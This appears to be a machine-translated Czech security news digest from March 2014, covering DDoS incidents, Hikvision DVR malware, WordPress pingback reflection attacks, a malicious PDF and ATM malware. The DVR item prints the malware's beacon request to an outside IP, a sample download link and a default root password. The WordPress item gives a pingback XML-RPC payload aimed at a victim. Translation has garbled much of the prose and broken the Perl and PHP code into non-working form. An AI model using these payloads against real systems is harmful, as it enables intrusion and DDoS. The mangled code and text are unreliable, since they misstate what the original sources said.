NameCheap DNS hit server s "novým typem" DDoS
31.3.2014 Počítačový útok
Populární registrátor domén a webhostingové služby si Vaši byl potíže s nečekaným DDoS útoku zaměřeného na 300 nebo tak domén na dvou svých svých DNS nameservery.

"Samotná velikost útoku zahlceni mnoha našich DNS serverů za následek nedostupnost a pomalý výkon. Naše původní odhady ukazují, že velikost útok na více než 100Gbps, dělat to jeden z největších útoků někdo viděl, nebo se týkají. A to je Nový typ útoku, který jsme my a naše hardwarové a síťové partneři dosud nesetkal, "si Vaši generální ředitel Richard Kirkendall a Vice President Matt Russell sdílené v příspěvku . útok začal kolem 15,55 GMT / 11.55 EST ve čtvrtek, a byl plně zmírnit o tři hodiny později, ale to trvalo nějakou dobu pro všechny DNS služby společnosti vrátit zpět do normálu. "Náš DNS platforma je nadbytečný, globální platforma se šíří přes 3 kontinentech a 5 zemí, které zpracovává DNS pro mnoho našich zákazníků. To je platforma pečlivě udržovány a běžel, a platforma, která úspěšně odrazí další DDoS útoky na téměř denně, "vysvětlil dva, ale dodal, že se stále snažil udržet své služby k dispozici zákazníkům. "Trvalo nám asi 3 hodin, aby plně zmírnění útoku, úzce spolupracuje s naším hardware a sítě dodavatelů, "oni dále sdílet, a oznamuje zlepšení, aby k podobným útokům v budoucnu:" Jsme předkládání klíčovou infrastrukturu programu vylepšení DNS, který bude vidět nás masivně rozšířit Velikost naší infrastruktury DNS a naši schopnost absorbovat a odrazit útoky, jako jsou tyto. " Velikost útoku není největší, kdo někdy viděl, jako 300 gigabitů za sekundu (ve špičce) DDoS byla zaměřena proti SpamHaus v loňském roce, a teprve nedávno Cloudflare odhalil jejich infrastruktura, které byly podrobeny jednomu dosažení 400 gigabitů za sekundu. Nicméně, DDoS útoky jsou stále vážnou obtíž, zejména proto, že útočníci začali využívat zranitelné servery NTP namontovat masivní reflexe útoků. To je ještě známo, zda servery NameCheap je byly hit s tímto konkrétním typu DDoS - ". nový typ útoku" Kirkendall a Russell jen řekl, že je Vzhledem k tomu, že NTP reflexe útoky nejsou tak nové a neznámé, Zajímalo by mě, jestli byli svědky další, dosud (do značné míry), neznámý a nepoužívaný typ útoku.


Černé trhy pro hackery jsou splatné
31.3.2014 Kriminalita

Černé a šedé trhy pro počítač hackerských nástrojů, služeb a vedlejších produktů, jako jsou čísla kreditních karet ukradl i nadále rozšiřovat, vytváří rostoucí hrozbu pro podniky, vlády a jednotlivce, podle nové RAND Corporation studie . Jedním dramatickým příkladem je porušení prosince 2013 maloobchodní gigant Target, ve kterém byla data z přibližně 40 milionů kreditních karet a 70 milionů uživatelských účtů unesli. Během dnů, které údaje se objevil - k dispozici pro nákup -. Na černé webových stránkách trhu "používá Hacking být činnost, která byla prováděna především jednotlivců, kteří se sám, ale v průběhu posledních 15 let se svět hackingu se stala organizovanější a spolehlivé, "řekla Lillian Ablon, vedoucí autor studie a analytik informačních systémů v RAND, neziskové výzkumné organizace. "V některých ohledech, počítačová kriminalita může být lukrativní a jednodušší provést, než nelegálního obchodu s drogami." Růst počítačové kriminality byl nápomocen sofistikované a specializované trhy, které volně se zabývají nástroji a zkazí počítačové trestné činnosti. Jedná se o položky, jako je například využití sady (softwarových nástrojů, které vám pomohou vytvářet, distribuovat a spravovat útoky na systémy), botnety (skupina napadených počítačů dálkově řízené centrální orgán, který může být použit k odesílání nevyžádané pošty nebo povodňové webové stránky), ve znění -a-service modely (hacking k pronájmu) a ovoce o počítačové trestné činnosti, včetně čísel kreditních karet ukradl a napadených hostitelů. Ve světle několika vysoce medializovaných zatýkání a zvýšení schopnosti vymáhání práva sundat některé trhy, přístup mnoho z těchto černých trzích se stále omezenější, se zločinci prověřování potenciálních partnerů před nabídkou přístup k vyšším úrovním. To znamená, že jednou, tam je velmi nízká bariéra pro vstup na účast a zisk, podle zprávy. vědci RAND provedla více než dvě desítky rozhovorů s kybernetické bezpečnosti a souvisejících odborníků, včetně akademiků, vědců zabezpečení, novináři, výrobců a dodavatelů bezpečnostních a právních předpisů úředníci vymáhání. Studie popisuje charakteristiky počítačové kriminality černých trzích, s dodatečnou pozornost věnovaná botnetů a jejich role v černém trhu, a "zero-day" zranitelnosti (softwarové chyby, které jsou neznámé prodejců a bez softwarové záplaty). Výzkumníci také zkoumat různé projekce a prognózy na to, jak může černý trh vyvíjet. co dělá tyto černé trhy pozoruhodná je jejich odolnost a propracovanost, řekl Ablon. Dokonce i spotřebitelé a podniky opevněný své aktivity v reakci na bezpečnostní hrozby, zločinci se přizpůsobit. Zvýšení donucovacích zatčení vedlo hackerů jdou po větších cílů. Stále více a více trestných činů mají digitální komponent. K dispozici bude více aktivity v "darknets", více kontroly a prověrky účastníků, větší využití crypto-měnách, jako Bitcoin, větší možností anonymity v malware, a větší pozornost k šifrování a ochranu komunikace a transakce. Pomáhal takovými trhy, bude schopnost zaútočit pravděpodobně předstihnout schopnost bránit. Hyper-připojení vytvoří více bodů přítomnosti pro útok a využití tak, že trestná činnost stále více bude mít síťové nebo počítačové komponenty, vytváří širší škálu možností pro černý trhy. Vykořisťování sociálních sítí a mobilních zařízení bude i nadále růst. K dispozici bude více hacking-pro-pronájem, as-a-service nabídky a počítačové trestné činnosti makléře. Odborníci však nesouhlasí o tom, kdo bude nejvíce ovlivněn růstem černého trhu, jaké výrobky budou na vzestupu a které typy útoky budou častější, uvedl Ablon.


Více Device Malware: To je důvod, proč vaše DVR napadl svou stanici Synology Disk Station (a nyní s Bitcoin Miner!)

31.3.2014 Malware

Aktualizace: Jen našel to, co vypadá jako Bitcoin horník na infikované DVR. K dispozici jsou další dvě binárky. D72BNr, Bitcoin miner (dle info využití založené na řetězcích) a mzkk8g, které looksl Ike se simplar http agenta, možná stáhnout další nástroje snadno (podobně jako stočit / wget, který není nainstalován na tomto DVR ve výchozím nastavení). Přidám tyto dva soubory https://isc.sans.edu/diaryimages/hikvision.zip krátce.

Minulý týden jsme informovali, že některé skenování hostitelů na portu 5000 ar DVR (přesněji: Hikvision DVR, běžně používané pro záznam videa z kamer [1]).

Dnes jsme byli schopni obnovit malware odpovědnost. Zde si můžete stáhnout https://isc.sans.edu/diaryimages/hikvision.zip malware zde (heslo: infikované).

Malware je umístěn v / dev / cmd.so. Řada dalších podezřelých souborů, kde se nachází v adresáři / dev, které stále potřebujeme obnovit / analyzovat z testovacího systému. Compromisse DVR pravděpodobné, že se stalo přes exponované telnet portu a výchozí heslo uživatele root (12345).

Analýza malware je stále ještě probíhá, a každá pomoc je vítána (viz odkaz na malware výše). Zde jsou některé počáteční zjištění:

- Malware je ARM binární, což znamená, že je zaměřovací přístroje, není typický x86 Linux serverů.
- malware vyhledá Synology zařízení vystavené na portu 5000. Žádost http poslal malware:

GET / Webman / info.cgi? Host = HTTP/1.0
Host: [IP adresa cílového]: 5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application / x-www-form-urlencoded
Content-Length: 0

- Pak extrahuje detaily verze firmware a přenáší je na 162.219.57.8. Žádost použitý pro tento kanál hlášení:

GET / k.php? H =% lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Připojení: zavřít

Takže ve zkratce, tento malware je jen skenování pro zranitelné zařízení, a skutečné využití bude pravděpodobně přijde později.

[1] http://www.hikvision.com/en/us/Products_show.asp?id=4258


Analýza 244.703 DDoS incidentů
31.3.2014 Počítačový útok

Týmu NSFocus vydala své DDoS Threat Report 2013, který upřesňuje útoku trendy a metody v uplynulém roce. Zpráva obsahuje statistické analýzy a klíčové poznámky na základě 244.703 DDoS incidentů.

Pozorování ukazují, že DDoS útoky jsou splatné v době APT. DDoS útoky byly použity jako smokescreens k provádění APT útoků nebo pro jiné nekalým účelům. Zpráva také konstatuje, že dostupnost DDoS-as-a-Service, která poskytuje komukoli s počítačem a kreditní kartu schopnost provést útok. DDoS zesílení útoky budou i nadále představovat výzvu, jako útok března 2013 ve věci protisoutěžních jednání -spam organizace Spamhaus se ukázalo, v němž doprava dosáhla 300 Gbps. Nicméně, potenciál pro přísnější útoky DDoS amplifikace, např. takové, využívající pro NTP, mohou výrazně překročit limity šířky pásma vidět aktuální. "DDoS se rychle stává běžnou bolest bod a podniky potřebují, aby tuto hrozbu vážně, pokud by očekávali na poskytovat nepřetržitou službu svým zákazníkům, "řekl Frank Ip, viceprezident operací v USA pro Týmu NSFocus. V roce 2013, cyberattackers dal trh lekci hackernomics a představila nesčetné způsoby, v nichž se vyvinuly své strategie útoku nasadit sofistikované metody, které budou způsobit maximální množství škody pomocí nejmenším počtem zdrojů. Čím více se dozvídáme o útoku mentalitě, silnější naše obrana stane, "Ip přidal. Zjištění ukazují, že hackernomics je hnací silou, která zastřešuje DDoS trend menších, kratších a opakované útoky. Účelem většiny útoků je narušit, ne zničit. Jak takové, malé aplikační vrstvě nebo hybridní útoky, které jsou levnější, aby zahájila, může způsobit velké škody k síťovým zdrojům. attacks DNS zvýšila v důsledku pokroku v technologiích anti-DDoS, které mohou lépe NAVRCHOLU.cz TOPlist Další útoku, a DNS infrastruktura stále zůstává jedním z nejslabších článků.


Wordpress "Pingback" DDoS útoky

31.3.2014 Počítačový útok

Sucuri zjistil zajímavou "reflexní" útok pomocí funkce Wordpress Pingback zaútočit na webové stránky [1]. Na rozdíl od jiných reflexních útoky, které používají UDP služby, jako je NTP a DNS, tento útok využívá funkci Wordpress Pingback.

V úmyslu ze Pingback je upozornit na stránky, které jste odkaz na odkaz doufat, že stránky, které se spojují, aby se oplatit. Některé systémy automatizovat a spravovat automatické seznamy, které odkazují zpět na stránky, které se vztahuje jejich článek. Za účelem provádění pingback, Wordpress implementuje funkci API XML-RPC. Tato funkce bude poté odeslat požadavek na stránkách, na které byste chtěli poslat "pingback".

S Wordpress, Pingback je odeslána jako požadavek POST na požadavek / xmlrpc.php. Tělo žádosti bude vypadat takto:

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://victim</string></value></param>
<param><value><string>http://reflector</string></value></param>
</params>
</methodCall>

Pro útok viděný Sucuri, URL "oběť" zahrnoval náhodný parametr jako "victim.com? 123456 = 123456", aby se zabránilo ukládání do mezipaměti.

Výsledkem této žádosti je, že váš Wordpress instalace zašle požadavek na stránkách oběti. Nemyslím si, že útok bude poskytovat významnou dopravní zesílení, ale to poplést skutečný zdroj útoku.

Ve výchozím nastavení je tato funkce povolena ve všech Wordpress instaluje, a není zcela snadné vypnutí. Sucuri doporučuje přidat následující filtr API Wordpress:

add_filter ("xmlrpc_methods", funkce ($ metody) {
unset ($ metody ['pingback.ping']);
return $ metody;
});

Odstranění xmlrpc.php se nedoporučuje, protože to bude šroty řadu dalších funkcí, které používají rozhraní API.

[1] http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html


NTIA začíná přechod správy kořenové DNS

31.3.2014 IT

Americké Národní telekomunikační a informační administrace (NTIA) začala závěrečná fáze privatizace řízení Domain Name System (DNS), který pohání Internet. Tento přechod byl zahájen v roce 1997.

Z tiskové zprávy ...

" Jako první krok, NTIA se ptá na Internetové sdružení pro přidělování jmen a čísel (ICANN) o svolání globální zúčastněné strany, aby vypracovala návrh na přechod na aktuální úlohu NTIA v koordinaci systému doménových jmen na internetu je (DNS). "

NTIA, ve spojení s ICANN a Verisign, je v současné době zodpovídá za správu kořenové zóny, včetně podání souboru kořenové zóny, která obsahuje podrobnosti o domény nejvyšší úrovně (TLD). V TLD jsou poslední část Full Qualified Domain Name (FQDN), jako je například. Com,. Gov, mil., Atd.

- Rick Wanner - rwanner v ISC dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter: namedeplume (Protected)


Normalizace IPv6 adresy

31.3.2014 Bezpečnost

Jednou z nepříjemností s IPv6 adres je, že mohou být zkráceny. Přední "0" je možno vynechat, a skupiny všech ": 0000", může být nahrazena "::". Klíčem nepříjemnost je "může" slovo. Některé záznamy (např. iptables) nebude zkracovat, jiní, jako například Nginx nebo apache, bude zkracovat, což koreluje protokoly obtížněji.

V poslední době jsem začal používat malý skript v Perlu, aby "normalizovat" mé adresy IPv6 v protokolech. Skript vložte všechny chybějící "0", s. usnadňuje najít konkrétní adresu IP. Skript jsem pomocí:

#! / Usr / bin / perl

use strict;

while (<>) {
my $ řádek = $ _;
if ($ řádek = ~ / [0-9a-f:] + /) {
my $ old = $ &;
my $ new = fillv6 ($ old);
$ Řádek = ~ s / $ / starého $ new /;
}
print $ vedení;
}


sub fillv6 {
my $ v = shift;
$ V = ~ s / ^ :/ :/ 0000;
moje @ díly = split (/ :/, $ v);
my $ partn = skalární @ díly;
if ($ partn <7) {
my $ x = "0000:" x (9 - $ partn);
$ V = ~ s / :: / $ x :/;
$ V = ~ s / :: / / g;
@ Díly = split (/ :/, $ v);
}
while (my $ part = každý (@ díly)) {
$ části [$ part] = sprintf ("% 04s", $ části [$ článek]);
}
návrat join (':', @ dílů);
}
Co jsem mohl použít, je trochu rozmanitější záznamy IPv6, zda se vztahuje na všechny možné případy. Skript je právě teď v "práce pro mě" stavu, tak dejte mi vědět, jestli to funguje i pro vás.


Škodlivý PDF poslal masivní podvod na kolumbijské uživatelů tvrdí, že je z kreditní skóre agentury

31.3.2014 Viry

Máme zprávy o masivní podvod poslal do kolumbijských uživatelů tvrdí, že je z jednoho ze dvou kreditní skóre agentur v Kolumbii. Agentura se nazývá Datacredito, přidružený k Experian. Následující e-mail byl přijat:

email obdrželi

email obdrželi

Tato e-mailová představuje jako záznam o falešně negativní zprávy o úvěrovou agenturou. Je dodáván s připojeným PDF s následujícími informacemi:


Soubor nezobrazuje nebezpečný náklad při skenování pomocí antimalware software. Nicméně, tento soubor má strukturu ve formátu PDF. Ater pomocí PDFStreamDumper pro přezkoumání, následující zajímavé informace se objevily:

PDF Stream Dumper

PDF Stream Dumper

Tento PDF má škodlivý skriptování, který instruuje čtenáře stáhnout a spustit na adresu uvedenou v předchozím URL. Po stažení souboru zobrazené v této adresy URL, která je živá v této době, keylogger je stáhnout.

Škodlivé PDF jsou stále problémem. Pokud chcete, aby se zabránilo pádu do jedné z těchto podvodů, nezapomeňte prosím následující:

Mít poslední verzi programu Acrobat Reader nainstalovaný ve vašem počítači
Neotevírejte přílohy z neznámých zdrojů
Neumožňují skriptování v nastavení čtečky akrobat. Udržujte jej vypnout.


Jaké telefony používají světoví politici?

31.3.2014 Mobil
BlackBerry je na ústupu a Apple a Samsung se těší na nové státní zakázky.

Po léta byla jedinou uznávanou značkou telefonů, dostatečně bezpečnou pro vládu libovolné země, značka BlackBerry. Po celou tu dobu byla tato platforma považovaná za bezpečnou, i když opak mohl naznačovat například to, že čelní američtí představitelé mohli používat pouze modifikované, běžně nedostupné verze.

Dnes je již zřejmé, že zabezpečení BlackBerry bylo zlomeno a zneužito agenturou NSA, stejně jako jiné a startovací pole se tedy znovu vyrovnalo. Především výrobci Apple a Samsung se snaží posilovat své bezpečnostní řešení a mimo jiné získat oprávnění na dodávání telefonů do citlivých vládních kruhů.

V různých zemích jsou ovšem politikové různě tolerantní, paranoidní či možná tvrdohlaví a jejich požadavky na vlastní chytrý telefon se liší...

Německo

Telefon německé kancléřky Angely Merkelové se na nějakou dobu zřejmě stal nejznámějším telefonem ve světě politiky, když v říjnu minulého roku vyšlo najevo, že americká agentura NSA monitorovala její hovory. Ve skutečnosti ale mluvíme o dvou telefonech, klasická Nokia 6260 Slide, kterou NSA odposlouchávala, byla zřejmě používaná jen pro méně významné hovory. Státní záležitosti byly řešeny na telefony BlackBerry Z10, dovybaveném šifrovacím čipem společnosti Secusmart, která i nadále tvrdí, že její software je odolný proti odposlechům.

Rusko

Prezident Vladimir Putin je známý svým tvrzením, že mobilní telefon vůbec nevlastní. Ještě v roce 2006 podle vlastních slov měl řadu telefonů, ale nepoužíval je, protože preferuje jiné metody komunikace. Proti tomu předseda vlády Medvěděv miluje výrobky Apple a byl jedním z prvních vlastníků telefonu iPhone 4 (Steve Jobs mu osobně daroval jeden exemplář ještě v době, kdy nebyl v prodeji). Je nepochybné, že jedním z důvodů Putinovy averze vůči telefonům jsou jeho zkušenosti s bezpečností z dob, kdy fungoval jako agent KGB.

Francie

Francouzský prezident Francois Hollande se prakticky neoddělitelný od svého iPhonu 5. Nicméně ten by měl používat pouze pro soukromé účely. Dlouho před skandálními odhaleními Edwarda Snowdena o sledování francouzských občanů agenturou NSA byli čelní francouzští politici vybaveni bezpečnými telefony Teorem se schopností šifrování hovorů. Ale například pro Nicolase Sarkozyho byl Teorem příliš nepohodlný – mimo jiné díky tomu, že vytočení hovoru trvalo 30 sekund – že preferoval své oblíbené BlackBerry.

Severní Korea

V současnosti se odhaduje, že mobilní telefon vlastní přibližně 2 milionů Severokorejců, tedy cca 10 procent z 25milionového národa. Většina z nich je ovšem mohou použít pro vnitrostátní hovory a SMS, mobilní internet není k dispozici a mezistátní hovory jsou k dispozici pouze pro cizince. Většina modelů jsou rebrandované čínské modely, podle fotografií severokorejský vůdce používá běžný produkt tchajwanského výrobce HTC.

USA

První bitvou, kterou musel vybojovat Barack Obama po nástupu do své funkce, byl model telefonu, který by mohl používat. Podle jeho slov nesmí z bezpečnostních důvodů používat iPhone, a teprve po značném boji si mohl ponechat svůj oblíbený BlackBerry, ovšem modifikovaný model s vylepšeným šifrováním. Telefon upravovala NSA, která má s průnikem do různých značek telefonů největší zkušenosti.


Bezpilotní letoun umí ukrást data z vašeho telefonu

31.3.2014 Špionáž
Společnost SensePost představila na bezpečnostním veletrhu v Singapuru vlastního létajícího špeha.

Dron, který dostal jméno Snoopy, používá vlastní software společnosti nainstalovaný na připevněném počítači k získání přístupu do cizích mobilních zařízení a odcizení osobních dat. Majitel napadeného přístroje přitom nemá o ničem ani tušení.

Do hledáčku dronu se dostávají pouze zařízení, která právě vyhledávají bezdrátový signál. „Každé mobilní zařízení, které u sebe nosíme, vysílá jedinečný podpis – dokonce i kardiostimulátory dnes používají Wi-Fi,“ řekl Glenn Wilkinson, autor Snoopyho. Během svého letu tak může dron přijít k zajímavým informacím – kontaktům i přístupovým údajům k bankovnímu účtu.

Mnoho uživatelů chytrých telefonů nikdy nevypíná bezdrátový modul Wi-Fi. Telefon se tak neustále snaží najít nejbližší dostupnou bezdrátovou síť, do které by se mohl připojit, a to včetně v minulosti již použitých sítí. „Mnoho takových sítí používá unikátní jména a snadno lze určit jejich polohu,“ řekl Wilkinson, podle kterého Snoopy využívá kombinaci jména sítě, kterou uživatel hledá, a adresu MAC, která jednoznačně identifikuje dané zařízení, k sledování uživatelovi polohy v reálném čase.

Stejně tak by někdo mohl vytvořit síť se stejným jménem, jaké měla již v minulosti použitá síť. Do ní se následně uživatel připojí, protože k ní má důvěru. Ve skutečnosti však útočníkům dá přístup ke svým osobním datům.

Sílu svého řešení předvedli vývojáři ze SensePost na konferenci Black Hat v Singapuru. Wilkinson pouze vytáhl z batohu notebook, spustil program Snoopy a za chvíli vlastnil osobní informace stovek účastníků konference. Pomocí několika stisků kláves například zjistil, v jaké části Singapuru pravděpodobně žil jeden z účastníků sedící v pravém zadním rohu. Dokonce pak zobrazil fotografii předpokládané adresy.

Uživatelé chytrých zařízení by si při používání bezdrátových sítí měli dávat dobrý pozor. Podobný útok lze totiž provést i bez dronu. Létající zařízení pouze zvyšuje možný rozsah a účinek takového útoku. Ostatně, i sám Wilkinson přiznává, že v používaném softwaru nejde o nic nového. Nový je pouze způsob jeho využití.

Jak se tedy tomuto typu útoků bránit? Wilkinson v první řadě doporučuje vypnout bezdrátový modul a zapínat jej pouze v případě, že jej skutečně potřebujete.


Tvůrci malwaru se tentokrát zaměřili přímo na Česko

31.3.2014 Viry
Desetinu veškerých zachycených počítačových hrozeb v Česku představoval tuto středu trojský kůň VBS/CoinMiner – je zjevné, že tuzemskem prošel mohutný počítačový útok, tvrdí

Analytická síť Eset ThreatSense, která sbírá údaje o počítačových hrozbách, zjistila, že šest počítačů z tisíce se 26. 3. 2014 stalo terčem pokusu o zapojení do sítě, která se podílí na těžbě virtuální měny Bitcoin.

Na vině byl trojský kůň VBS/CoinMiner, který existuje ve dvou variantách, z nichž jedna se popsala už v prosinci 2012 a druhá v září 2013. Šíří se ve vlnách s přibližně tříměsíční periodou. A poslední vlna se zacílila především na Českou republiku a na Slovensko.

V Česku byl podíl této hrozby na všech zachycených hrozbách 9,9 procenta a na Slovensku to bylo 7,92 procenta. Zemí s třetím nejvyšším výskytem – ale ve výši pouhých 8 promile - bylo Řecko.

VBS.CoinMiner je rodina skriptů vytvořených ve Visual Basicu. Jsou to malé, nenápadné soubory (často zašifrované), které se díky tomu snadno šíří buď stahováním z webových stránek, nebo v emailech.

Nejsou to ale programy, které by dělaly samotnou těžbu bitcoinů. Trojské koně mají pouze za úkol tyto výkonné programy stahovat či updatovat a stahovat pro ně konfigurace, připravovat pro ně prostředí (například přidáním výjimky do firewallu nebo jeho vypnutím), a také je spouštět.

Eset také oznámil, že na trh uvedl novou verzi řešení Cyber Security Pro a Cyber Security, antimalware pro počítače Mac.

Mezi hlavní vylepšení patří například nový modul Anti-Phishing, který přidává novou vrstvu ochrany: hlídá, zda navštívená internetová stránka je skutečně legitimní web, nebo zda nejde o podvodnou stránku, která se snaží získat citlivé osobní údaje, jako jsou uživatelská jména a hesla nebo informace o bankovních účtech či kreditních kartách.

Inovovaný modul Social Media Scanner zase zlepšuje ochranu facebookového účtu uživatele i jeho přátel a navíc přidává vrstvu ochrany pro Twitter. Umožňuje mj. skenovat účty, a to buď automaticky, nebo na vyžádání a ukazuje i aktuální úroveň nastavení ochrany soukromí na Facebooku i Twitteru nebo doporučuje případně změnu nastavení. Novinkou je i přepracované uživatelské rozhraní.


Útočníci používají SMS k výběru z infikovaných bankomatů

31.3.2014 Mobil
Skupinka podnikavých kyberzločinců přišla na to, jak z jistého typu peněžních automatů dostat za použití textových zpráv peníze.

Nejnovější vývoj škodlivého softwaru zvaného Ploutus popsala bezpečnostní společnost Symantec, která tento malware dlouhodobě sleduje.

Malware, který se poprvé objevil v Mexiku, je navržen tak, aby dostal peníze z jistého typu samostatně stojících bankomatů. Symantec však zatím nebyl schopen tento typ bankomatů identifikovat, přestože dostal jeden z nakažených automatů k otestování.

Ploutus není zrovna jednoduché nainstalovat. Útočníci musí mít k bankomatu přímý přístup. To je pravděpodobně i důvod, proč si vybírají právě samostatně stojící bankomaty, do kterých se mohou lépe dostat.

Ranou verzi Plouta bylo možné ovládat pomocí numerického rozhraní přímo v bankomatu nebo pomocí připojené klávesnice. V poslední verzi však malware doznal značných změn a nově jej lze ovládat i na dálku přes SMS.

V této verzi útočníci otevřou bankomat a připojí k němu mobilní telefon, který následně funguje jako ovladač. Přes textové zprávy lze pak posílat příkazy k výběru hotovosti.

„Když telefon rozpozná zprávu v určitém formátu, zařízení tuto zprávu převede do síťového paketu a do infikovaného bankomatu ji předá přes USB kabel,“ napsal v blogovém příspěvku Daniel Regalado ze Symantecu.

Podle Regalada je tento nový způsob mnohem diskrétnější. Útočníci již pro výběr peněz nemusejí zadávat číselný kód na klávesnici bankomatu. U automatu tak stráví méně času, čímž se snáze vyhnout odhalení. Nyní jen do bankomatu zadají přes telefon příkaz a pro peníze někoho pošlou.

Symantec při této příležitosti rovněž připomněl, že přes 95 % bankomatů stále používá starý operační systém Windows XP, o čemž jsme vás dříve také informovali.


NSA se prolomila do serveru ve firmě Huawei

31.3.2014 Špionáž
Během víkendu byly uveřejněny zprávy tvrdící, že americká agentura NSA se dostala do serverů centrály Huawei, špehovala komunikace vedení společnosti a připravovala si půdu na infikování vybavení tohoto výrobce.

Podle informací, které během víkendu vyšly v časopisech The New York Times a Der Speigel a které jsou postaveny na dokumentech získaných Edwardem Snowdenem, NSA úspěšně pronikla do sítě v centrále Huawei Technologies v čínském městě Šen-čen.

Agentura NSA odmítla komentovat tvrzení, že systematicky napadala centrálu společnosti Huawei Technologies a monitorovala komunikaci nejvyššího vedení. V e-mailu adresovanému IDG News Service agentura tvrdí, že odmítá komentovat podobná konkrétní obvinění ze špionážních aktivit: „Aktivity agentury NSA jsou cílené pouze na podložené zahraniční špionážní cíle v reakci na požadavky v souladu svého mandátu.“

Jde o další zprávy v dlouhotrvajícím špionážním seriálu. Představitelé Spojených států po léta tvrdí, že Čínská lidová armáda spolupracuje s výrobci a kyberzločinci na špionáži proti americkým společnostem a vládním agenturám. Od loňského června ovšem dokumenty postupně uvolňované dřívějším externím spolupracovníkem NSA Edwardem Snowdenem v různých agenturních organizacích ukazují, že NSA byla zapletena do řady rozsáhlých výzvědných programů, včetně těch zacílených na čínské výrobce síťového hardwaru.

NSA se usilovně snaží distancovat od čínských aktivit a podle ní nikdy u NSA nedochází ke sběru dat, která by posloužila ke krádežím cenných informací cizích společností ve prospěch amerických.

Operace s kódovým označením Shotgiant se jednat snažila prokázat spojení mezi čínskou armádou a Huawei a současně implantovat zadní vrátka do síťového vybavení určeného na prodej zákazníkům společnosti. Citované dokumenty pocházejí z roku 2010, počátek operace se ale datuje až do roku 2006. Není jasné, jak úspěšná byla, protože technické detaily nebyly na základě žádosti americké vlády uveřejněny.

V každém případě v druhé polovině roku 2011 americké ministerstvo průmyslu zabránilo tomu, aby se produkty firmy Huawei mohly podílet na projektu budujícím národní bezdrátovou síť. Huawei také na únorové výstavě mobilní techniky oficiálně potvrdila, že se prakticky vzdala účasti na budování síťové infrastruktury USA, což je krok, který se může projevit i na poklesech prodejů jejích mobilních zařízení, jejichž je třetím největším výrobcem na světě.

Huawei situace využila k prohlášení, že se prokazuje, že nikdy dobrovolně nepředávala žádná data vládě, ať americké nebo čínské, a že by se měli výrobci spojit a řešit problematiku vlastní bezpečnosti kolektivně a mnohem intenzivněji.


Provozovatelé bankomatů přemýšlejí nad Linuxem

31.3.2014 Bezpečnost
Konec podpory operačního systému Windows XP, na kterém jsou typicky postaveny systémy bankomatů, povede k hledání alternativy, kterou můžou být i distribuce Linuxu.

Některé finanční servisní organizace přemýšlejí nad možností migrace jejích bankomatů z Windows na Linux ve snaze získat větší moc nad vlastním hardwarem a softwarovými aktualizacemi. Windows XP dnes pohání téměř 95 procent bankomatů a od 8. dubna, kdy Microsoft oficiálně ukončuje podporu tohoto systému, zůstanou bez technické podpory a podle Microsoftu musí být považovány na nechráněné.

Je pochopitelné, že Microsoft doporučuje okamžitou aktualizaci na novější verzi Windows. Řada společností již přešla či přechází na Windows 7, nejbližší alternativu, ale očekává se, že po 8. dubnu bude stále ještě více než 60 procent z celkového počtu automatů (jen v USA to znamená 400 000 kusů) na Windows XP. Rada dohlížející nad bezpečnostními standardy v platebních transakcích PCI SSC (Payment Card Industry Security Standards Council) si je situace vědoma a bude požadovat po organizacích nějakou formu kompenzačních mechanismu, díky kterému by i nadále byla garantována – když ne bezpečnost – tak alespoň naplnění požadavků norem PCI DSS.

Před systémem Windows XP se většina výrobců bankomatů spoléhala na operační systém IBM OS/2. Window XP a vestavná (embedded) verze Windows XP byly hlavním faktorem umožňujícím přítomnost Microsoftu v retailovém segmentu, kde především embedded XP byly schopny provozu na velmi nenáročném hardwaru. Pro řadu existujících modelů by tak přechod na Windows 7 vyžadoval upgrade hardwaru. Nový bankomat přitom stojí od 15 000 do 60 000 dolarů a jeho provozovatelé většinou počítají s jeho 7 až 10letou životností. Nový hardware by vedle licenčních poplatků značně prodražil migraci. A to provozovatele již čekají investice do implementace podpory pro nové standardy chytrých platebních karet EMV (Europay Mastercard Visa), navíc nedlouho po tom, co museli investovat do splnění požadavků normy ADA (Americans with Disabilities Act).

Řada z nich by preferovala scénář, kdy by si Microsoft nechal náležitě zaplatit za prodloužení podpory Windows XP, i když chápou, že pokračování investování do mrtvého OS, který již řadu let není v prodeji, akcionáře společnosti zrovna neosloví. Na druhou stranu situace nahrává právě alternativním platformám a podle některých materiálů již více než 30 procent pokladen v amerických obchodech se smíšeným zboží a benzinových pump běží na operačním systému Linux. Bankomaty by je tedy mohly následovat.


Google Glass mají velký problém s bezpečností

31.3.2014 Bezpečnost
Nedávný experiment univerzitních výzkumníků se spywarem ukázal, že Google musí před uvedením chytrých brýlí na trh ještě vydatně zapracovat na jejich zabezpečení.

Mike Lady a Kim Paterson, dva výzkumníci z kalifornské Polytechnické státní univerzity, vytvořili pravděpodobně vůbec první spyware pro chytré brýle Google Glass. Po jeho instalaci brýle každých 10 sekund pořizují fotografii a obratem ji posílají na vzdálený server.

Uživatel brýlí přitom o tom, že někdo snímá jeho okolí, nemá ani ponětí. Aplikace je totiž v provozu jen tehdy, kdy je displej brýlí vypnutý. Google sice vývojářům zakazuje vytváření aplikací, které se chovají podobným nežádoucím způsobem, v softwaru brýlí však není nic, co by jim v takovém chování mohlo zabránit.

„Pro mě osobně to bylo velké překvapení, protože Google Glass jsou venku už asi rok. Očekával bych proto, že si tohoto problému už někdo všiml a Google přišel s řešením,“ řekl Lady.

Lady a Paterson spyware zamaskovali jako poznámkovou aplikaci, kterou pojmenovali Malnotes a následně ji nahráli do obchodu Google Play. Výzkumníci tak chtěli současně otestovat, zda automatické mechanismy obchodu odhalí škodlivou aplikaci. Aplikace nahrávané do speciální obchodu MyGlass jsou zatím kontrolovány ručně – zde by pravděpodobně aplikace byla odhalena, protože neobsahuje žádnou jinou funkcionalitu než tajné pořizování fotek.

Google byl na existenci spywaru upozorněn poté, co se výzkumníci svou prací pochlubili na Twitteru. Nejprve chtěl po výzkumnících zdrojový kód a obvinil je z možného porušení vývojářských podmínek. Později však svůj postoj přehodnotil a uznal, že šlo o legitimní součást výzkumu.

Výzkumníci spyware zamaskovali jako legitimní aplikaci také proto, aby ukázali, že jen díky tomu vzroste šance, že aplikace od uživatele získá povolení k přístupu na internetu a k používání fotoaparátu.

